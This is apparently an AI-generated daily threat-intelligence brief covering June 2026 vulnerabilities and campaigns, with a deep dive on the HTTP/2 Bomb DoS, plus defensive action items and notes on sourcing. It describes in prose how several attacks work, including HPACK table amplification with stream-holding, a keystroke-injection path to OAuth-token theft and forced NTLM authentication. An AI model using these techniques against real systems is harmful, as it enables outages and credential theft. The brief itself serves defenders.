ctipilot.ch

CTI Daily Brief — 2026-06-04

Typedaily
Date2026-06-04
GeneratorClaude Opus 4.8 (`claude-opus-4-8`)
ClassificationTLP:CLEAR
LanguageEnglish
Promptv2.60
Items13
CVEs18
On this page

On this page

Tags (22)
Regions (6)
References (37)

0. TL;DR

  • HTTP/2 Bomb (CVE-2026-49975) exhausts a server's RAM from one connection in ~10 s — a composite of HPACK dynamic-table amplification plus Slowloris-style stream-holding that needs no authentication and works against default HTTP/2 configs. nginx (≥1.29.8) and Apache mod_http2 (v2.0.41) are patched; Microsoft IIS, Envoy and Cloudflare Pingora remained unpatched at disclosure, with a working write-up public (Calif/Codex, 2026-06-02). See § 5.
  • Magento object-injection RCE is in CISA KEV and exploited in the wild. CVE-2026-45247 in the Mirasvit Full Page Cache Warmer extension deserializes the CacheWarmer cookie with no auth → unauthenticated RCE; CISA KEV-listed and exploitation confirmed by Imperva, fix is v1.11.12 (Sansec, 2026-05-26). See § 2.
  • Two WordPress plugins under active mass-exploitation give unauthenticated admin takeover. Kirki (CVE-2026-8206, 500k installs) and Burst Statistics (CVE-2026-8181, 200k installs) — REST-API auth-bypass / password-reset hijack, thousands of attacks blocked within 24 h of disclosure (SecurityWeek, 2026-06-03). See § 2.
  • Two critical advisories hit public-sector infrastructure defenders run themselves: an unauthenticated SSRF-to-root in Cisco Unified CM (CVE-2026-20230) and an OTP-bypass in MISP (CVE-2026-10611) — the threat-intel platform deployed across EU/CH national CERTs. See § 2.
  • NCSC Switzerland warns of Booking.com-fuelled WhatsApp hotel-booking phishing spoofing TWINT and Swiss bank portals, plus hotel-system account-takeover impersonation that arrives through legitimate booking channels (NCSC-CH, 2026-06-02). See § 1.
  • A shared hotel-booking SaaS breach exposed guests at 100+ Dutch, Belgian and Irish hotels, and a separate UN World Food Programme breach exposed ~600,000 Gaza households' IDs and locations — both already weaponised for follow-on fraud / physical-safety risk. See § 1.

3. Research & Investigative Reporting

Huntress: Windows `search:` URI handler leaks NTLMv2 hashes — Microsoft declines to patch

Huntress detailed an unpatched NTLMv2-leak in the Windows search: protocol handler: a crafted link with a crumb=location: parameter pointing at an attacker UNC path makes Windows open an outbound SMB (TCP 445) connection and expose the user's Net-NTLMv2 challenge-response for offline cracking or relay (Huntress, 2026-06-03 · The Hacker News, 2026-06-03). The bug class is structurally identical to the Snipping Tool ms-screensketch: handler leak (CVE-2026-33829) patched in April; Huntress reported the search: variant a day later but Microsoft declined a CVE or fix, assessing it as Moderate severity — below the Important/Critical threshold of its servicing bar. Forced-authentication mapping is T1187. The single highest-value control neutralises the whole URI-handler leak class: block outbound SMB (TCP 445/139) at host firewall and perimeter for endpoints that don't need external shares, and enable EPA on NTLM-accepting services.

Enclave: a single debug flag left on in six Microsoft 365 Android apps allowed silent OAuth-token theft

Researchers at Enclave found a shared Android SDK across six Microsoft 365 apps shipped setIsDebugMode(true) in production, disabling the AccountManager check that restricts token sharing to trusted Microsoft apps — so any co-installed third-party app could silently obtain long-lived OAuth tokens for the signed-in Microsoft identity with no prompt (SecurityWeek, 2026-06-02 · The Hacker News, 2026-06-03). Affected: Word (CVE-2026-41101), PowerPoint (CVE-2026-41102), Excel (CVE-2026-42832), Microsoft 365 Copilot (CVE-2026-41100), Loop and OneNote — collectively billions of installs; Teams was unaffected because its flag was correctly false. Tokens granted read/write to Exchange mail, OneDrive and Calendar. Microsoft fixed all six in the 12 May 2026 cycle; no ITW reported pre-patch. Enforce minimum-version compliance for these apps via Intune/MDM on BYOD fleets and, where logs exist, review AccountManager token requests from non-Microsoft packages.

One-click GitHub OAuth-token theft via github.dev, full-disclosed with PoC; Microsoft patched 3 June

Independent researcher Ammar Askar published full details and a PoC for a one-click attack on GitHub's browser editor github.dev that extracts the victim's full-scope GitHub OAuth token (read/write to all repos, including private) (Ammar Askar, 2026-06-02 · The Hacker News, 2026-06-04). The attack abuses github.dev's embedded VSCode: a crafted page simulates synthetic keyboard events (keydown injection) to drive the editor into silently installing a malicious workspace extension, which then reads and exfiltrates the OAuth token the editor holds (T1528); Askar notes the technique does not rely on bypassing postMessage origin validation. The token is not scoped to the repo in use. Askar disclosed one hour before publishing, citing prior silent-fix experience with Microsoft; Microsoft shipped a fix on 3 June. Until updated clients are confirmed, avoid github.dev with untrusted extensions installed and watch GitHub audit logs for token use from unexpected IPs/user-agents.

Symantec: five-month, low-and-slow mailbox-espionage campaign against a global stock exchange

Broadcom's Symantec and Carbon Black documented a targeted espionage operation (Oct 2025–Mar 2026) against a senior executive at an unnamed global stock exchange (Broadcom/Symantec, 2026-06-03 · SecurityWeek, 2026-06-03). The actor persisted with masqueraded binaries (armsvc.exe, oneservice.exeT1036.005) and scheduled tasks, then ran a custom Aspose-based OST stealer to incrementally exfiltrate the target's entire Outlook mailbox in small batches via the Dropbox API and OneDrive Personal (T1114.001, T1567.002), deliberately using hard-coded Microsoft IP addresses instead of hostnames to defeat DNS-based detection. Tooling also included FRPC, SharpDecryptPwd and Secretsdump (T1003.001). No attribution is offered; the assessed motive is intelligence collection. Detection concepts: scheduled-task creation by non-SYSTEM processes (EID 4698 / Sysmon 12), .ost reads by processes other than Outlook.exe (Sysmon 11), and outbound HTTPS to Dropbox API endpoints from non-browser processes.

4. Updates to Prior Coverage

No qualifying updates in window — every item this run is first coverage. Items already covered with no material in-window delta (e.g. Operation Dragon Weave, deep-dived 2026-06-02; the EU CRA 11 June milestone, covered in weekly 2026-W22) are not re-reported — see § 7.

5. Deep Dive — HTTP/2 Bomb (CVE-2026-49975): a single-connection memory-exhaustion DoS against every major web server

The Codex research team (Calif) published HTTP/2 Bomb, assigned CVE-2026-49975, a remote denial-of-service that takes most major web servers offline from one connection in roughly ten seconds with no authentication and against their default HTTP/2 configuration (Calif/Codex, 2026-06-02). At disclosure the researcher counted 880,000+ public-facing servers with HTTP/2 enabled on affected software — a population that includes a large share of government web portals, citizen-facing services and reverse-proxy front ends.

Mechanics — two old primitives composed into one new amplifier. The attack chains two separately documented HTTP/2 behaviours (Calif/Codex, 2026-06-02). First, HPACK dynamic-table amplification: the attacker seeds the server's header-compression table with one large entry, then references it thousands of times per request using single-byte back-references, forcing the server to reconstruct a large header set in memory for each reference. Second, Slowloris-style stream holding: the attacker keeps every allocated stream open indefinitely with a continuous trickle of WINDOW_UPDATE frames, so the reconstructed memory is never freed. Combined, a single residential connection drove an Envoy instance to exhaust about 32 GB of RAM in ~10 s. The root cause is structural: RFC 7541 §7.3 bounds dynamic-table size via SETTINGS_HEADER_TABLE_SIZE but never caps the number of references per request independently of total size, and per-stream memory lifetime is unbounded while WINDOW_UPDATE activity continues — so no in-spec setting alone closes the gap.

Affected and patched versions (vendor-stated). nginx is fixed in 1.29.8, which introduces a new max_headers directive defaulting to 1000; Apache httpd is fixed in mod_http2 v2.0.41, shipped as a standalone module release and not yet folded into a 2.4.x release at disclosure (oss-security, 2026-06-03). At initial disclosure Microsoft IIS, Envoy and Cloudflare Pingora had no patch; a 3 June update to the disclosure notes Envoy has since shipped a fix (advisory GHSA-22m2-hvr2-xqc8), leaving Microsoft IIS and Cloudflare Pingora unpatched (Calif/Codex, 2026-06-02). The disclosure was deliberately timed after nginx shipped its fix; the researcher released publicly — with mitigations — assessing that the nginx/Apache commit diffs could be turned into a working exploit quickly, so defenders needed the mitigation guidance immediately.

ATT&CK. This is availability impact through a software-flaw resource-exhaustion path — T1499.004 Endpoint Denial of Service: Application or System Exploitation, reached over application-layer protocol abuse (T1071.001).

Hardening / mitigation, by stack. nginx: upgrade to 1.29.8+ (the max_headers cap is the structural fix) or, as a stop-gap, set http2 off;. Apache: apply the mod_http2 v2.0.41 standalone release, or set Protocols http/1.1 as an interim — note that lowering LimitRequestFields is not effective here because the cookie-crumb references never count against it; only LimitRequestFieldSize reduces per-stream blast radius. Envoy: apply its 3 June fix (advisory GHSA-22m2-hvr2-xqc8). Microsoft IIS / Cloudflare Pingora (still no vendor patch): disable HTTP/2 at the edge where feasible, and apply per-worker memory limits (cgroups / ulimit -v) so a bombed worker is OOM-killed before it exhausts the host (oss-security, 2026-06-03).

Hunt and detection concepts. The traffic signature is unusual: a spike in short HTTP/2 requests from a single source IP that drives per-worker memory consumption sharply upward while the connection count stays low relative to the memory pressure — the inverse of a classic volumetric flood (Calif/Codex, 2026-06-02). Watch for streams kept alive by WINDOW_UPDATE frames with no accompanying DATA frames, and instrument per-worker RSS so an anomalous single-connection memory climb pages before the host OOMs. No IOCs are warranted — the indicator is the behaviour, not an address.

6. Action Items

  • Mitigate HTTP/2 Bomb on every internet-facing HTTP/2 endpoint. Upgrade nginx to ≥1.29.8, Apache to mod_http2 v2.0.41, and Envoy per its 3 June fix (GHSA-22m2-hvr2-xqc8); for Microsoft IIS and Cloudflare Pingora (still no patch) disable HTTP/2 at the edge where feasible and set per-worker memory limits so a bombed worker is OOM-killed before the host. Note LimitRequestFields is ineffective for Apache here. (§ 5)
  • Patch the actively-exploited web CVEs today. Mirasvit Cache Warmer → ≥1.11.12 or WAF-block the CacheWarmer cookie (CVE-2026-45247, KEV/ITW); WordPress Kirki → ≥6.0.7 and Burst Statistics → ≥3.4.2, then hunt for rogue admin-account creation and unauthenticated REST calls (CVE-2026-8206 / CVE-2026-8181). (§ 2)
  • Remediate the public-sector-infrastructure advisories. MISP → commit 39b3cb15 (or temporarily drop the LdapAuth.mixedAuth+require_otp combo); Cisco Unified CM → 14SU6 / Release 15 COP or disable WebDialer. (§ 2)
  • Block outbound SMB (TCP 445/139) at host and perimeter for endpoints with no external-share need — this neutralises the unpatched Windows search: URI NTLMv2 leak and the wider URI-handler forced-auth class. (§ 3)
  • Enforce minimum-version compliance for Microsoft 365 Android apps (Word/PowerPoint/Excel/Copilot/Loop/OneNote) via Intune on BYOD fleets to close the OAuth-token-theft path. (§ 3)
  • Brief Swiss staff and travel bookers on the hotel-booking-channel account-takeover phishing (legitimate-channel lures, TWINT/bank look-alikes), and add Nobitex/OFAC-designated wallet clusters to sanctions screening for any Iran-nexus extortion forensics. (§ 1)

7. Verification Notes

  • Items dropped:
    • IMA Diligence Services / Genesis ransomware (525,306 affected) — US-only firm, no confirmed CH/EU nexus, breach dated Dec 2025 surfacing now; defender value limited to a generic legacy-third-party-server audit lesson. Cut per less-is-more.
    • SafeBreach "Fake Context Alignment" Gemini Android prompt injection — genuinely fresh research (public 2026-06-03) but Google patched the classifier in Nov 2025, so the operational exposure is residual-only; cut for low time-criticality.
    • Devolutions Server DEVO-2026-0013/0014 (CVE-2026-9047 MFA bypass; CVE-2026-7325 LDAP coercion) — BSI WID-SEC-2026-1781, but no confirmed exploitation and CVSS <9, so it does not clear a § 2 inclusion gate. PAM operators should still patch to 2026.1.19.0+ / 2025.3.22.0+.
    • Progress Sitefinity CMS cluster (CVE-2026-7312 CVSS 10.0, CVE-2026-7198, CVE-2026-7201, CVE-2026-7313, CVE-2026-7195; BSI WID-SEC-2026-1783) — dropped on verification. The only reachable sources (BSI portal, Progress community advisory) render client-side and returned shells, so the technical description could not be independently confirmed; an NVD cross-check indicated CVE-2026-7312 is CWE-522 Insufficiently Protected Credentials (Sitefinity Insight credential disclosure, gated on an active Insight integration / non-default configuration) rather than the OData access-control bypass first drafted. No in-the-wild exploitation; patched in 15.4.8630 / 15.3.8531 / 15.2.8441 / 15.1.8335. DACH/EU public-sector Sitefinity operators should still apply the fixed builds; will be revisited if a fetchable vendor primary lands.
    • Operation Dragon Weave (Seqrite) — duplicate; deep-dived 2026-06-02 with no material in-window delta (same Seqrite source).
    • EU Cyber Resilience Act 11 June milestone — already covered in weekly 2026-W22 (weekly-policy); no new delta.
    • Europol IOCTA 2026 — out of window (published 2026-04-29); annual baseline retained for background only.
  • Single-source / reduced-confidence items: WFP Gaza breach — only UpGuard was reachable (The New Humanitarian primary returned 403; WFP spokesperson quotes corroborated via search). DesckVB RAT — Huntress is the sole fetched primary (research-lab IR finding). National-authority single primaries accepted under the PD-5 carve-out as the disclosing party: NCSC Switzerland (hotel phishing), US Treasury/OFAC (Nobitex). Vendor/CERT single primaries where the vendor advisory was the only reachable authoritative source: Cisco PSIRT (CVE-2026-20230); BSI CERT-Bund WID-SEC-2026-1783 for Sitefinity (Progress vendor advisory not reachable in-run).
  • Reduced confidence — aggregator/news-only sourcing: the Dutch-hotel breach (DutchNews.nl, Techzine) and the M365 Android OAuth-theft item (SecurityWeek exclusive, The Hacker News) rest on journalism rather than a reachable vendor/research primary — Hospecs has not named the upstream SaaS vendor, and Enclave's own write-up / MSRC pages were not fetched in-run. Treat the specifics as journalism-grade until a vendor primary lands.
  • Recency: standard daily, gap 24 h, window 36 h. Several items carry a 2026-06-02 primary (NCSC-CH Week 22, MISP/CIRCL, Kirki) with in-window (2026-06-03) corroboration — retained as freshest available coverage.
  • Contradictions: none surfaced.
  • CVSS note: CVE-2026-8181 (Burst Statistics) and several non-exploited cluster CVEs lacked an assigned EPSS at fetch time (shown n/a).
  • Coverage gaps: databreaches-net (403, 4th consecutive failing run — WFP/Dutch-hotel stories covered via UpGuard/DutchNews/Techzine); inside-it-ch (403, 4th run — covered via heise/NCSC); sophos-xops (503, 4th run — no in-window alternate); cert-eu, anssi-fr (no in-window advisories); mandiant-gtig, volexity (RSS feeds stale, no in-window posts); edpb, cnil-fr, ico-uk, sec-edgar (no qualifying new enforcement/filing in window).
  • Sub-agents: all four (S1–S4, Claude Sonnet 4.6) returned within the window; no stalls.